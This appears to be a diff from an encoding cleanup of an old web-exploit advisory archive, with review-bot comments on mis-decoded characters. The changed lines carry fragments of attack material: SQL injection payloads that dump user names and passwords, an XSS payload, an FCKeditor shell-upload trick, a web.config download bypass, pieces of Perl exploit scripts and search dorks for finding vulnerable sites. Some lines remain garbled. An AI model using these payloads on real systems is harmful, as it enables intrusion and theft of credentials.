#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
|
||||
#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR
|
||||
#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR
|
||||
#ShouTZ:kedar,dec0d3r,41.w4r10r
|
||||
#Catch us at www.andhrahackers.com or www.teamicw.in
|
||||
############################################################################
|
||||
|
@ -75,8 +75,8 @@ DEMO : TO change the admin login details and other info..
|
|||
<input type=text name=Adminlevel value="Root">
|
||||
</td>
|
||||
</tr>
|
||||
<td width="168"> </td>
|
||||
<td width="220"> </td>
|
||||
<td width="168"> </td>
|
||||
<td width="220"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td colspan="2">
|
||||
|
|
|
@ -1,38 +1,38 @@
|
|||
==============================================================================
|
||||
|
||||
[»] ~ Note : LionTurk.Turkblog.com Resmi Web Sitem :D
|
||||
[»] ~ Note : LionTurk.Turkblog.com Resmi Web Sitem :D
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»]Mesut Manþet Haber V1.0 Auth Bypass Vulnerability
|
||||
[»]Mesut Manþet Haber V1.0 Auth Bypass Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»] Script: [ Mesut Manþet Haber V1.0 ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Download: [ http://www.aspindir.com/goster/5377]
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com - LionTurk.Turkblog.com }
|
||||
[»] My Home: [ RevengeHack.com & Ar-ge.Org ]
|
||||
[»] N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
[»] Script: [ Mesut Manþet Haber V1.0 ]
|
||||
[»] Language: [ ASP ]
|
||||
[»] Download: [ http://www.aspindir.com/goster/5377]
|
||||
[»] Founder: [ LionTurk - Bylionturk@kafam1milyon.com - LionTurk.Turkblog.com }
|
||||
[»] My Home: [ RevengeHack.com & Ar-ge.Org ]
|
||||
[»] N0T3 : Yeni Aciklarimi Bekleyin.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
||||
===[ Exploit And Dork ]===
|
||||
|
||||
[»] http://lionturk.turkblog.com/[dizin]/admin/admin_haber.asp or
|
||||
[»] http://lionturk.turkblog.com/[dizin]/admin/admin_haber.asp or
|
||||
/admin/admin_haber.asp?islem=ekle_kaydet
|
||||
|
||||
Ýn the Admin panel
|
||||
Ýn the Admin panel
|
||||
|
||||
[»] Mesut Manþet Haber
|
||||
[»] Mesut Manþet Haber
|
||||
|
||||
|
||||
Author: LionTurk <-
|
||||
|
||||
- Turk'uz Varmi Otesi?
|
||||
|
||||
Dandirik Scriptler Kullanmayýn.
|
||||
Dandirik Scriptler Kullanmayýn.
|
||||
|
||||
|
||||
###########################################################################
|
||||
|
|
|
@ -12,7 +12,7 @@
|
|||
|
||||
** Risk : High
|
||||
|
||||
** Dork : "Diseño Web Hernest Consulting S.L."
|
||||
** Dork : "Diseño Web Hernest Consulting S.L."
|
||||
|
||||
************************************************************
|
||||
|
||||
|
|
|
@ -28,12 +28,12 @@ http://localhost/[path]/controlpanel/
|
|||
|
||||
-------------------------------------------------------------------------------------------
|
||||
|
||||
Öyle bir özlemişim ki seni
|
||||
Artık dönsen de olur dönmesen de
|
||||
Öyle bir özlemişim ki seni
|
||||
Artık dönsen de olur dönmesen de
|
||||
Ben her daim yine sana sitemli yine sana hasret giderim
|
||||
Aziz yar sen bir sabah bu şehri başıma yıkıp gittin
|
||||
Dağları deviriverdin üstüme hiç çekinmedin
|
||||
Ben bu şehirde bir daha da sabah görmedim
|
||||
Günaydınlar olmadı günler aymadı sensiz ........
|
||||
Dağları deviriverdin üstüme hiç çekinmedin
|
||||
Ben bu şehirde bir daha da sabah görmedim
|
||||
Günaydınlar olmadı günler aymadı sensiz ........
|
||||
|
||||
-------------------------------------------------------------------------------------------
|
|
@ -25,5 +25,5 @@
|
|||
**
|
||||
** Greetz to : ALLAH
|
||||
** All Members of http://www.DZ4All.cOm/Cc
|
||||
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n &
|
||||
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n &
|
||||
***********************************************************
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
** Home : N/A
|
||||
** Vunlerability : SQL Injection
|
||||
** Risk : High
|
||||
** Dork : "Sitedesign by: Dieleman www.dieleman.nl - Copyright © 2010"
|
||||
** Dork : "Sitedesign by: Dieleman www.dieleman.nl - Copyright © 2010"
|
||||
************************************************************
|
||||
** Discovred by: Ra3cH
|
||||
** From : Algeria
|
||||
|
|
|
@ -14,7 +14,7 @@ greetz to :All ICW members.
|
|||
###############################################################################################################
|
||||
Description:
|
||||
|
||||
Looking for a Real Estate Listing script? Our Virtual Real Estate Manager was developed in ASP ( Active Server Pages ) and an Access database. End User Features : » Search by Area and type of property » Listings Page includes thumbnail of the property, Short Description, city, date added and price. » Details Page includes - 4 thumbnails that open in a new window with larger view. Heading, Description of the property, Details of the property, email to a friend and request more info. Admin Features : » Add, Edit and Delete Properties - upload images » Add, Edit and Delete Categories » Add, Edit and Delete Area » Change Password VRM : Is delivered via a ZIP file. You receive this exact template with the application. Easy to customize with knowledge of html or one of the following: Design Requirements : Front page - Recommended * Macromedia Dreamweaver Configuration Requirements: Notepad WordPad
|
||||
Looking for a Real Estate Listing script? Our Virtual Real Estate Manager was developed in ASP ( Active Server Pages ) and an Access database. End User Features : » Search by Area and type of property » Listings Page includes thumbnail of the property, Short Description, city, date added and price. » Details Page includes - 4 thumbnails that open in a new window with larger view. Heading, Description of the property, Details of the property, email to a friend and request more info. Admin Features : » Add, Edit and Delete Properties - upload images » Add, Edit and Delete Categories » Add, Edit and Delete Area » Change Password VRM : Is delivered via a ZIP file. You receive this exact template with the application. Easy to customize with knowledge of html or one of the following: Design Requirements : Front page - Recommended * Macromedia Dreamweaver Configuration Requirements: Notepad WordPad
|
||||
|
||||
###############################################################################################################
|
||||
|
||||
|
|
|
@ -4,7 +4,7 @@ Version:1.0
|
|||
Price:$149.97
|
||||
Vendor url:http://dmxready.com/?product=online-notebook-manager
|
||||
Published: 2010-06-09
|
||||
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer,d3c0d3r and to all ICW members
|
||||
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer,d3c0d3r and to all ICW members
|
||||
###############################################################################################################################################################################################
|
||||
|
||||
Online Notebook Manager SQLi Vulnerability
|
||||
|
|
|
@ -33,14 +33,14 @@ Spl Greetz to:inj3ct0r.com Team
|
|||
Description:
|
||||
|
||||
VU Web Visitor Analyst is an application that retrieves your website
|
||||
visitors’ IP address, visited date and time, visited page name, the link a
|
||||
visitors’ IP address, visited date and time, visited page name, the link a
|
||||
visitor came from originally (referred URL address). You can view the single
|
||||
visitor history with the list of all pages visited. You can also display
|
||||
visits by date criteria. The weekly statistics allow you to see the total
|
||||
visits for every single day in the present and last weeks. The monthly
|
||||
statistics allow you viewing the total visits of every month for the whole
|
||||
year. In addition, every visitor is linked to the web database containing
|
||||
personal information about this visitor’s IP address (such as name, address,
|
||||
personal information about this visitor’s IP address (such as name, address,
|
||||
phone, email, etc. if available).
|
||||
Pleasant and professional graphic user interface will make your statistical
|
||||
experience more enjoyable.
|
||||
|
|
|
@ -22,8 +22,8 @@ Sex
|
|||
</select>
|
||||
</p>
|
||||
<p>Avatar :<input type="text" name="icon" size="49" value="icon"></p>
|
||||
<p><EFBFBD></p>
|
||||
<p><EFBFBD></p>
|
||||
<p> </p>
|
||||
<p> </p>
|
||||
|
||||
</form>
|
||||
</frewal>
|
||||
|
|
|
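Review bot: Both copies of the changed line are `<p><EFBFBD></p>`. EF BF BD is the UTF-8 encoding of U+FFFD, the replacement character, so the original byte was already lost before this change and re-encoding the file cannot bring it back. Restore the character from the original submission if it is still available; otherwise this line is churn and could be left out of the change.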
@ -54,7 +54,7 @@ $xpl = LWP::UserAgent->new() or die;
|
|||
$req = HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd) or die("\n\n Failed to connect.");
|
||||
$res = $xpl->request($req);
|
||||
$r = $res->content;
|
||||
$r =~ tr/[\n]/[鷯/;
|
||||
$r =~ tr/[\n]/[ê]/;
|
||||
|
||||
if (@ARGV[4] eq "-r")
|
||||
{
|
||||
|
|
|
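Review bot: The two copies of the transliteration line differ in more than encoding. In `$r =~ tr/[\n]/[鷯/;` the closing `]` of the replacement list has been swallowed by a mis-decoded multibyte sequence, so the replacement list no longer lines up character for character with the search list `[\n]`; `$r =~ tr/[\n]/[ê]/;` is balanced. Make sure the balanced form is the one that ends up in the file. Two smaller points on the same lines: `tr` takes no character classes, so the brackets are literal characters mapped to themselves, and `@ARGV[4]` in the context below is a one-element slice where `$ARGV[4]` is meant.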
@ -20,7 +20,7 @@ http://address/Portal/Research/ResearchPlan/UserStart.aspx
|
|||
'or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
|
||||
|
||||
====================================================================================
|
||||
Dork: just search for "????"
|
||||
Dork: just search for "سیدا"
|
||||
|
||||
====================================================================================
|
||||
~Blackout Frenzy [http://b0f.ir]
|
||||
|
|
|
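Review bot: On the `Dork:` line one copy has "????" and the other "سیدا". Question marks are a lossy substitution rather than a mis-decoding, so the readable string cannot have been derived from the "????" bytes. Confirm that it was taken from the original advisory, and that the file is now stored as UTF-8 so the value survives the next conversion.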
@ -1,5 +1,5 @@
|
|||
===================================================
|
||||
AKY Blog SQL ?njection
|
||||
AKY Blog SQL İnjection
|
||||
===================================================
|
||||
|
||||
Author : Madconfig
|
||||
|
|
|
@ -149,7 +149,7 @@ As a result you can input value for Bypass filters and access critical informati
|
|||
|
||||
After that results will be shown in DataGrid in Page.
|
||||
|
||||
With another value, we can retrieve Information’s of Users:
|
||||
With another value, we can retrieve Information’s of Users:
|
||||
|
||||
AddExtraSQL:1=1/**/Union/**/s;e;l;e;c;t/**/Name,Password,Email,UserID,2,Salt,1/1/1900,3,user,NEWID(),user/**/f;r;o;m/**/rb_users;-;-/**/sp_password
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@ http://cloudscan.blogspot.com/2010/10/vendor-smartertoolscom-smartermail-7x.html
|
|||
########################################################################
|
||||
# Vendor: smartertools.com SmarterMail 7.x (7.2.3925)
|
||||
# Date: 2010-10-01
|
||||
# Author : David Hoyt (sqlhacker) – Hoyt LLC
|
||||
# Author : David Hoyt (sqlhacker) – Hoyt LLC
|
||||
# Contact : h02332@gmail.com
|
||||
# Home : http://cloudscan.me
|
||||
# Dork : insite: SmarterMail Enterprise 7.1
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
########################################################################
|
||||
# Vendor: smartertools.com SmarterMail 7.x (7.2.3925)
|
||||
# Date: 2010-10-01
|
||||
# Author : David Hoyt (sqlhacker) – Hoyt LLC
|
||||
# Author : David Hoyt (sqlhacker) – Hoyt LLC
|
||||
# Contact : h02332@gmail.com
|
||||
# Home : http://cloudscan.me
|
||||
# Dork : insite: SmarterMail Enterprise 7.2
|
||||
|
|
|
@ -10,7 +10,7 @@ TradeMC E-Ticaret - (SQLi/XSS) Multiple Vulnerabilities
|
|||
~Web App. : TradeMC E-Ticaret
|
||||
~Software: http://www.trademc.net/
|
||||
~Vulnerability Style : SQL-i (XSS) Multiple
|
||||
~Google Keywords : "TradeMC Tarafından Hazırlanmıştır"
|
||||
~Google Keywords : "TradeMC Tarafýndan Hazýrlanmýþtýr"
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Meterials : SQLInjection TOOL or Table name Bruteforcer
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
|
|
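Review bot: The Google Keywords line gets worse here. The first of the two versions reads "TradeMC Tarafından Hazırlanmıştır" and the second reads "TradeMC Tarafýndan Hazýrlanmýþtýr", which is Turkish text decoded as Latin-1/Windows-1252 (ı shown as ý, ş shown as þ). Decode this file as Windows-1254 or ISO-8859-9 before converting to UTF-8, or exclude it from the batch so the readable form is kept.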
@ -8,7 +8,7 @@
|
|||
# EDB-ID: 5765 (only 1 SQL injection)
|
||||
|
||||
|
||||
# Ariko-Security: Security Audits , Audyt bezpiecze?stwa
|
||||
# Ariko-Security: Security Audits , Audyt bezpieczeństwa
|
||||
# Advisory: 745/2010
|
||||
|
||||
============ { Ariko-Security - Advisory #1/11/2010 } =============
|
||||
|
|
|
@ -1,26 +1,26 @@
|
|||
==============================================================================
|
||||
|
||||
[»] Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability
|
||||
[»] Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability
|
||||
|
||||
==============================================================================
|
||||
|
||||
[»] Title : [ Acidcat CMS v 3.x (fckeditor) Shell Upload Vulnerability ]
|
||||
[»] Title : [ Acidcat CMS v 3.x (fckeditor) Shell Upload Vulnerability ]
|
||||
|
||||
[»] Script : [ Mini-NUKE v2.3 ]
|
||||
[»] Script : [ Mini-NUKE v2.3 ]
|
||||
|
||||
[»] Language: [ ASP ]
|
||||
[»] Language: [ ASP ]
|
||||
|
||||
[»] Download: [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free]
|
||||
[»] Download: [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free]
|
||||
|
||||
[»] Author : [ Net.Edit0r - black.hat.tm@gmail.com }
|
||||
[»] Author : [ Net.Edit0r - black.hat.tm@gmail.com }
|
||||
|
||||
[»] My Home : [ ajaxtm.com and datacoders.org ]
|
||||
[»] My Home : [ ajaxtm.com and datacoders.org ]
|
||||
|
||||
[»] Date : [ 2010-11-23 ]
|
||||
[»] Date : [ 2010-11-23 ]
|
||||
|
||||
[»] Version : [ 3.3.X and 3.2.x ]
|
||||
[»] Version : [ 3.3.X and 3.2.x ]
|
||||
|
||||
[»] Dork : [ "Powered by Acidcat CMS " ]
|
||||
[»] Dork : [ "Powered by Acidcat CMS " ]
|
||||
|
||||
|
||||
|
||||
|
@ -30,15 +30,15 @@
|
|||
===[ Exploit ]===
|
||||
|
||||
|
||||
[»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp
|
||||
[»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp
|
||||
|
||||
[»] asp renamed via the .asp;.jpg (shell.asp;.jpg)
|
||||
[»] asp renamed via the .asp;.jpg (shell.asp;.jpg)
|
||||
|
||||
===[ Upload To ]===
|
||||
|
||||
[»] http://server/read_write/file/[Shell]
|
||||
[»] http://server/read_write/file/[Shell]
|
||||
|
||||
[»] http://server/public/File/[Shell]
|
||||
[»] http://server/public/File/[Shell]
|
||||
|
||||
|
||||
Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , M4hd1
|
||||
|
|
|
@ -57,7 +57,7 @@ files of the BugTracker.NET:
|
|||
|
||||
6. *Credits*
|
||||
|
||||
This vulnerability was discovered and researched by Damián Saura
|
||||
This vulnerability was discovered and researched by Damián Saura
|
||||
[http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=researcher&name=Damian_Saura]
|
||||
and Alejandro Frydman from Core Security Technologies.
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
# Date: 05-12-2010
|
||||
# Vendor or Software Link: http://www.hotwebscripts.co.uk/
|
||||
# Category:WebApp
|
||||
# Price: £150
|
||||
# Price: £150
|
||||
# Contact: R4dc0re@yahoo.fr
|
||||
# Website: www.1337db.com
|
||||
# Greetings to: R0073r(1337db.com), L0rd CrusAd3r,Sid3^effects and to rest of the 1337db members
|
||||
|
|
|
@ -8,16 +8,16 @@
|
|||
+Tests : Windows XP SP 3 and Backtrack4 any other OS
|
||||
+Discovered by DeadLy DeMon
|
||||
+ Cyber - Warrior TIM =>> *www.cyber-warrior.org*
|
||||
+Greetz to All System-Hacker, BlackApple , F0RTYS3V3N , HUNT3R , ?air-ul
|
||||
+Greetz to All System-Hacker, BlackApple , F0RTYS3V3N , HUNT3R , Şair-ul
|
||||
Cihad and All KinqSqlZCrew
|
||||
Members
|
||||
---------------------------------------------------------------------------------------
|
||||
|
||||
Var m? içinizde beni tan?yan?
|
||||
Ya?anmadan çözülemeyen s?r benim.
|
||||
Kalmasada ?öhretimi duymayan,
|
||||
Kimli?imi tarif etmek zor benim..
|
||||
Akl?n?za Geliriz Akl?n?z Gider...
|
||||
Var mı içinizde beni tanıyan?
|
||||
Yaşanmadan çözülemeyen sır benim.
|
||||
Kalmasada şöhretimi duymayan,
|
||||
Kimliğimi tarif etmek zor benim..
|
||||
Aklınıza Geliriz Aklınız Gider...
|
||||
KinqSqlZ Crew Akar...
|
||||
----------------------------------------------------------------------------------------
|
||||
|
||||
|
|
|
@ -45,7 +45,7 @@ sub exploit ()
|
|||
print $as "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$as>) {
|
||||
if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) {
|
||||
if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) {
|
||||
if ($1 == $ARGV[2]) {
|
||||
print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n";
|
||||
}
|
||||
|
|
|
@ -12,7 +12,7 @@
|
|||
- Soroush Dalili (Irsdl [at] yahoo [dot] com) (secproject.com)
|
||||
|
||||
# Description:
|
||||
Regarding attack technique [1], it is possible to bypass the security protections of ?/download.aspx? in Douran Portal and download the hosted files.
|
||||
Regarding attack technique [1], it is possible to bypass the security protections of /download.aspx in Douran Portal and download the hosted files.
|
||||
|
||||
# PoC(s):
|
||||
Try this first and see the access denied error: http://[HOST]/download.aspx?FilePathAttach=/&FileNameAttach=web.config&OriginalAttachFileName=secretfile.txt
|
||||
|
@ -22,7 +22,7 @@ http://[HOST]/download.aspx?FilePathAttach=/&FileNameAttach=web.config%20&Origin
|
|||
http://[HOST]/download.aspx?FilePathAttach=/&FileNameAttach=wEB.CoNfiG&OriginalAttachFileName=secretfile.txt
|
||||
|
||||
# Reference:
|
||||
[1] Unrestricted File Download V1.0 ? Windows Server, (URL: http://soroush.secproject.com/blog/2011/01/unrestricted_file_download_v1_0/)
|
||||
[1] Unrestricted File Download V1.0 Windows Server, (URL: http://soroush.secproject.com/blog/2011/01/unrestricted_file_download_v1_0/)
|
||||
|
||||
# Important Notes:
|
||||
- Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in the website, we have used all the emails which had been found by searching in Google such as support, info, and so on.
|
||||
|
|
|
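Review bot: In the Reference entry the unknown character is deleted rather than restored: "V1.0 ? Windows Server" becomes "V1.0 Windows Server", so the cited title loses its separator. Put an ASCII hyphen there instead of dropping it. The same applies to the Description hunk above, where the marks around /download.aspx were removed instead of being turned back into quotes.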
@ -7,7 +7,7 @@
|
|||
# Software Link: http://www.element-it.com/downloadfile.aspx?type=pow
|
||||
# Demo:
|
||||
http://site.com/Examples/PowUpload/Simpleupload.htm
|
||||
<EFBFBD>
|
||||
|
||||
[Comment]
|
||||
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
|
||||
Login-Root, KikoArg, Ricota,
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
# Software: EAFlashUpload v 2.5
|
||||
# Software Link: http://www.easyalgo.com/downloads.aspx#EAFlashUpload
|
||||
# Demo: http://www.site.com/examples/eaflashupload/simpleupload.aspx
|
||||
<EFBFBD>
|
||||
|
||||
[Comment]
|
||||
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
|
||||
Login-Root, KikoArg, Ricota,
|
||||
|
|
|
@ -27,7 +27,7 @@ e-mail : root[at]exploit-id.com
|
|||
# Category:: webapps
|
||||
# Google dork: http://www.google.com/#q=intext%3A%22Powered+by+dhtml-menu-builder.com%22+inurl%3A.asp%3Fid%3D&hl=en&biw=1280&bih=709&prmd=ivns&ei=xES_TdTxI4-58gPk_ozUBQ&start=20&sa=N&fp=4fb1180a34b58d1d
|
||||
#Vendor: http://dhtml-menu-builder.com
|
||||
# Tested on: [Windows Vista Edition Intégrale]
|
||||
# Tested on: [Windows Vista Edition Intégrale]
|
||||
####
|
||||
|
||||
||>> Special Thanks To: All Exploit-Id Team
|
||||
|
|
|
@ -7,13 +7,13 @@
|
|||
##############################################
|
||||
===[ POC ]===
|
||||
|
||||
[»] http://website/[path]/careers-detail.asp?id=[SQL]
|
||||
[»] http://website/[path]/careers-detail.asp?id=[SQL]
|
||||
|
||||
[»] http://website/[path]/publications.asp?type=[SQL]
|
||||
[»] http://website/[path]/publications.asp?type=[SQL]
|
||||
|
||||
[»] http://website/[path]/WhatNew.asp?page=&id=[SQL]
|
||||
[»] http://website/[path]/WhatNew.asp?page=&id=[SQL]
|
||||
|
||||
[»] http://website/[path]/gallery.asp?cid=[SQL]
|
||||
[»] http://website/[path]/gallery.asp?cid=[SQL]
|
||||
##############################################
|
||||
|
||||
Greats T0 :
|
||||
|
|
|
@ -65,12 +65,12 @@ http://[URL]/archive.aspx?sid=19'; IF SYSTEM_USER='sa' waitfor delay
|
|||
'00:00:10'--&siteid=1
|
||||
|
||||
Binary Search Exploits:
|
||||
http://[URL]/about.aspx?siteid=1'; IF ASCII(SUBSTRING((?),i,1)) > k
|
||||
http://[URL]/about.aspx?siteid=1'; IF ASCII(SUBSTRING((<EFBFBD>),i,1)) > k
|
||||
waitfor delay
|
||||
'00:00:10'--
|
||||
|
||||
Note: In last POC, i is the i-th byte returned by the one-row subquery
|
||||
(?) and k is the
|
||||
(<EFBFBD>) and k is the
|
||||
current middle value of the binary search.
|
||||
|
||||
-------------
|
||||
|
|
|
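Review bot: Both changed lines still carry an undecodable character. The subquery placeholder read "(?)" before and now reads "(<EFBFBD>)", in the request line and again in the Note, which means the conversion wrote the replacement character (UTF-8 bytes EF BF BD) into the file instead of recovering the original. Use a plain ASCII placeholder such as "(...)" in both places so the Note's reference to "the one-row subquery" still points at something readable.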
@ -23,15 +23,15 @@ http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%
|
|||
|
||||
TURKISH
|
||||
# Ba.l.k : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
|
||||
# Sözcük[Arama] : "powered by phpmydirectory"
|
||||
# Aç... Bulan : ajann
|
||||
# Aç.k bulunan dosyalar;
|
||||
# Sözcük[Arama] : "powered by phpmydirectory"
|
||||
# Aç... Bulan : ajann
|
||||
# Aç.k bulunan dosyalar;
|
||||
|
||||
SQL INJECT.ON--------------------------------------------------------
|
||||
### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ
|
||||
### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=De.i.ken
|
||||
|
||||
Örnek:
|
||||
Örnek:
|
||||
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
|
||||
|
||||
XSS--------------------------------------------------------
|
||||
|
@ -39,7 +39,7 @@ XSS--------------------------------------------------------
|
|||
### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ
|
||||
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ
|
||||
|
||||
Örnek:
|
||||
Örnek:
|
||||
http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyar.s. c.kar.cakt.r.
|
||||
|
||||
Ac.klama:
|
||||
|
|
|
@ -55,7 +55,7 @@ sub getsession ()
|
|||
print "- Connected...\r\n";
|
||||
while ($answer = <$mns>) {
|
||||
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; }
|
||||
if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
|
||||
if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
|
||||
}
|
||||
#if you are here...
|
||||
die "- Exploit failed\r\n";
|
||||
|
@ -191,7 +191,7 @@ sub doadmin ()
|
|||
print "- You can login with password $mnpass on $mnlreq\r\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /Üyeler Açýktýr/) {
|
||||
if ($answer =~ /Üyeler Açýktýr/) {
|
||||
print "- Exploit failed\r\n";
|
||||
exit();
|
||||
}
|
||||
|
|
|
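Review bot: The match string in doadmin() is still mis-decoded after this change: /Üyeler Açýktýr/ has ý where Turkish ı belongs, which is what Windows-1254 bytes look like when read as Latin-1. The first two letters are repaired (Ãœ becomes Ü) but the rest of the literal is not, so the file ends up in a third state that matches neither the original bytes nor correct Turkish. Convert this file from Windows-1254 (giving "Üyeler Açıktır") rather than from Latin-1, or leave it out of the batch.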
@ -17,10 +17,10 @@ Mail
|
|||
<a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>
|
||||
|
||||
<font face="Verdana" size="2" color="#FF0000"><b>User
|
||||
Ýd
|
||||
Ýd
|
||||
: </b></font>
|
||||
<input type="text" name="id" value="" size="20">
|
||||
<font size="1" color="#C0C0C0" face="Arial"> Example: Ýd:1
|
||||
<font size="1" color="#C0C0C0" face="Arial"> Example: Ýd:1
|
||||
Admin</font><br>
|
||||
<font face="Verdana" size="2" color="#FF0000"><b>User Country :
|
||||
</b>
|
||||
|
|
|
@ -16,16 +16,16 @@ VL-ID:
|
|||
|
||||
Introduction:
|
||||
=============
|
||||
XPhone Unified Communications 2011 ist die leistungsstärkste Telefonie- und Kommunikationslösung von C4B.
|
||||
Sie ist leicht zu bedienen und verbessert die Arbeitsabläufe in Unternehmen. Die Lösung integriert sich
|
||||
XPhone Unified Communications 2011 ist die leistungsstärkste Telefonie- und Kommunikationslösung von C4B.
|
||||
Sie ist leicht zu bedienen und verbessert die Arbeitsabläufe in Unternehmen. Die Lösung integriert sich
|
||||
nahtlos in bestehende Anwendungen und nutzt die vorhandene Telefonanlage und IT-Infrastruktur. Dabei
|
||||
werden die verschiedensten Kommunikationsmittel wie Telefon, Handy, Fax, Voicemail, SMS und Instant Messaging
|
||||
vereint und mit Präsenzinformationen kombiniert. Die Software stellt leistungsfähige Telefonie-Funktionen in
|
||||
vereint und mit Präsenzinformationen kombiniert. Die Software stellt leistungsfähige Telefonie-Funktionen in
|
||||
praktisch allen Anwendungen wie z.B. Microsoft Outlook, Lotus Notes, Warenwirtschaftssystemen (ERP),
|
||||
|
||||
Kundendatenbanken (CRM) oder dem Webbrowser zur Verfügung. Die Verknüpfung von Telefonereignissen mit bestimmten
|
||||
Kundendatenbanken (CRM) oder dem Webbrowser zur Verfügung. Die Verknüpfung von Telefonereignissen mit bestimmten
|
||||
Aktionen, z.B. Starten von Anwendungen, automatische Erstellung von Briefen oder Faxe u.v.m, verbessert die
|
||||
Arbeitsabläufe in Unternehmen spürbar.
|
||||
Arbeitsabläufe in Unternehmen spürbar.
|
||||
|
||||
(Copy of the Vendor Homepage: http://www.c4b.de )
|
||||
|
||||
|
@ -106,7 +106,7 @@ may not apply. Any modified copy or reproduction, including partially usages, of
|
|||
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
|
||||
other media, are reserved by Vulnerability-Lab or its suppliers.
|
||||
|
||||
Copyright © 2012 Vulnerability-Lab
|
||||
Copyright © 2012 Vulnerability-Lab
|
||||
|
||||
--
|
||||
VULNERABILITY RESEARCH LABORATORY TEAM
|
||||
|
|
|
@ -3,13 +3,13 @@
|
|||
#Original advisory: http://www.nukedx.com/?viewdoc=42
|
||||
#Title: MaxiSepet <= 1.0 (link) SQL Injection Vulnerability.
|
||||
|
||||
#Dork: "Copyright MaxiSepet ©"
|
||||
#Dork: "Copyright MaxiSepet ©"
|
||||
|
||||
#How: Parameter link did not sanitized properly.
|
||||
|
||||
#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=SQL
|
||||
|
||||
#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20<b>',email,'</b><br>','Þifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC
|
||||
#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20<b>',email,'</b><br>','Þifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC
|
||||
|
||||
# nukedx.com [2006-06-11]
|
||||
|
||||
|
|
|
@ -150,7 +150,7 @@ retrieve users credential from user database requests
|
|||
\\\
|
||||
.------. ///
|
||||
(:::::::)(_)():-
|
||||
`------ー \\\
|
||||
`------° \\\
|
||||
Exploit sent ///
|
||||
|
||||
'."\n";
|
||||
|
|
|
@ -13,10 +13,10 @@ the protection and upload a file with any extension.
|
|||
|
||||
Note: Quick patch for FCKEditor 2.6.8 File Upload Bypass:
|
||||
|
||||
In “config.asp”, wherever you have:
|
||||
In “config.asp”, wherever you have:
|
||||
|
||||
ConfigAllowedExtensions.Add “File”,”Extensions Here”
|
||||
ConfigAllowedExtensions.Add “File”,”Extensions Here”
|
||||
|
||||
Change it to:
|
||||
|
||||
ConfigAllowedExtensions.Add “File”,”^(Extensions Here)$”
|
||||
ConfigAllowedExtensions.Add “File”,”^(Extensions Here)$”
|
||||
